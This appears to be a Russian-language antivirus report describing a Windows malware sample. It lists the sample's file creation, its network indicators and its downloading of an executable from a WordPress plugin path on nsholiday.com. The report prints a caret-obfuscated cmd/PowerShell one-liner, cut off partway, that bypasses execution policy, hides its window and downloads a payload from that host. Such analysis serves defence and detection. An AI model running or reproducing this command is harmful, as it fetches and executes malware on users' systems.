Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "pO^w^e^R^S^h^ell.exe -eXeCUT^iO^n^P^oli^CY BYP^as^s^ -^no^profil^e^ -wind^OwsTYle h^IdD^E^n (^NE^W^-oBJ^E^Ct ^SyStE^M.N^e^t.^w^e^BC^l^i^En^T).DoWN^L^oadFi^LE^('http://nsholid...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'ns###iday.com':80
TCP
Запросы HTTP GET
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
UDP
- DNS ASK ns###iday.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "pO^w^e^R^S^h^ell.exe -eXeCUT^iO^n^P^oli^CY BYP^as^s^ -^no^profil^e^ -wind^OwsTYle h^IdD^E^n (^NE^W^-oBJ^E^Ct ^SyStE^M.N^e^t.^w^e^BC^l^i^En^T).DoWN^L^oadFi^LE^('http://nsholid...' (со скрытым окном)
